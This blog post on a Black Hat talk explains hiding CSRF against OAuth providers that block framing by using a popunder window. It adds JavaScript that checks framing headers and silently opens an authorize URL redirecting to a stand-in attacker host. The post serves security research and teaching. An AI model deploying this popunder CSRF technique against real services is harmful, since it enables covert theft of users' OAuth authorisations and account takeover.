Hiding the CSRF with a popunder

The 2013BH tag links to all posts related to my recent Blackhat EU talk I gave in March. This is probably the last one (yeah, finally – I'm sick of talking about CSRF too), then I'll hopefully post the whole talk finally :)

How do we CSRF things that have X-Frame-Options enabled, so we can't use frames? With the OAuth attacks from the last few posts, the identity providers did in fact all enable X-Frame-Options. With OAuth, protecting against UI redressing is even in the spec, so just creating a frame to do all your sneaky stuff won't really work. X-Frame-Options is becoming more and more common.

We can always open a window, but a big popup isn't really ideal. In the OAuth examples I just popped up a window. It would be better if, when we popped up the window, we hid it. There are probably a lot of techniques here, but there are two options I explored: using a popunder, and just making the window jump around / hard to close.
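As an added example (my own code, not from the original post or the talk), here is the decision the text describes, in two parts: first, a check of a target's response headers to see whether a cross-origin frame is blocked by X-Frame-Options (or a CSP frame-ancestors directive, which browsers that support it honour over X-Frame-Options), and second, the classic popunder: open the CSRF URL in a small window and immediately push it behind the opener with child.blur() plus window.focus(). The window object is injected so the flow can be run in Node against a small fake window; the target URL, header values and the attacker origin are constructed for illustration and are not from the post.

```javascript
// Added example, not the original post's code. Header values, URLs and
// origins below are constructed for illustration.

// Normalise header names so lookups are case-insensitive.
function headerMap(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Returns true if a page at `attackerOrigin` cannot frame the target.
// CSP frame-ancestors is checked first because supporting browsers let it
// override X-Frame-Options; then DENY / SAMEORIGIN / ALLOW-FROM.
function framingBlocked(headers, attackerOrigin) {
  const h = headerMap(headers);
  const origin = attackerOrigin.toLowerCase().replace(/\/$/, '');
  const csp = h['content-security-policy'];
  if (csp) {
    const m = /(?:^|;)\s*frame-ancestors\s+([^;]+)/i.exec(csp);
    if (m) {
      const sources = m[1].trim().split(/\s+/)
        .map(s => s.replace(/^'|'$/g, '').toLowerCase().replace(/\/$/, ''));
      if (sources.includes('*')) return false;
      if (sources.includes('none')) return true;
      return !sources.includes(origin);
    }
  }
  const xfo = (h['x-frame-options'] || '').trim();
  const token = xfo.toUpperCase();
  if (token === 'DENY' || token === 'SAMEORIGIN') return true;
  if (token.startsWith('ALLOW-FROM')) {
    const allowed = xfo.slice('ALLOW-FROM'.length).trim().toLowerCase().replace(/\/$/, '');
    return allowed !== origin;
  }
  return false; // no framing policy at all: a plain <iframe> would do
}

// The popunder: open `url` in a tiny window pushed off-screen, then blur it
// and re-focus the opener so it drops behind the current page. `win` is the
// window object (the real `window` in a browser, a fake here in Node).
function popunder(url, win, features = 'width=1,height=1,left=9999,top=9999') {
  const child = win.open(url, '_blank', features);
  if (!child) return null; // popup blocker won: nothing to hide
  if (typeof child.blur === 'function') child.blur();
  win.focus();
  return child;
}

// Minimal stand-in for a browser window that records what was called.
function fakeWindow() {
  const log = [];
  return {
    log,
    open(url, target, features) {
      log.push(['open', url, target, features]);
      return { blur: () => log.push(['child.blur']), focus: () => log.push(['child.focus']) };
    },
    focus: () => log.push(['opener.focus']),
  };
}

// Constructed sample: an identity provider that sends X-Frame-Options: DENY.
const SAMPLE_HEADERS = { 'X-Frame-Options': 'DENY', 'Content-Type': 'text/html' };
const ATTACKER_ORIGIN = 'https://attacker.example'; // hypothetical
const CSRF_URL = 'https://idp.example/oauth/authorize?client_id=abc&redirect_uri=https%3A%2F%2Fattacker.example%2Fcb'; // hypothetical

// Decide how to deliver the CSRF: frame it if we can, else popunder.
function chooseVector(headers, csrfUrl, win, attackerOrigin = ATTACKER_ORIGIN) {
  if (!framingBlocked(headers, attackerOrigin)) return { vector: 'iframe', url: csrfUrl };
  const child = popunder(csrfUrl, win);
  return { vector: child ? 'popunder' : 'blocked', url: csrfUrl };
}

// Stand-alone run in Node: show the choice and the window calls it made.
if (typeof window === 'undefined') {
  const w = fakeWindow();
  console.log(chooseVector(SAMPLE_HEADERS, CSRF_URL, w), w.log);
}
```

In a real browser you would pass `window` as `win`; note that current browsers only allow window.open from a user gesture and have largely closed the blur/focus popunder trick, so this reproduces the mechanics discussed here rather than something that works unchanged today.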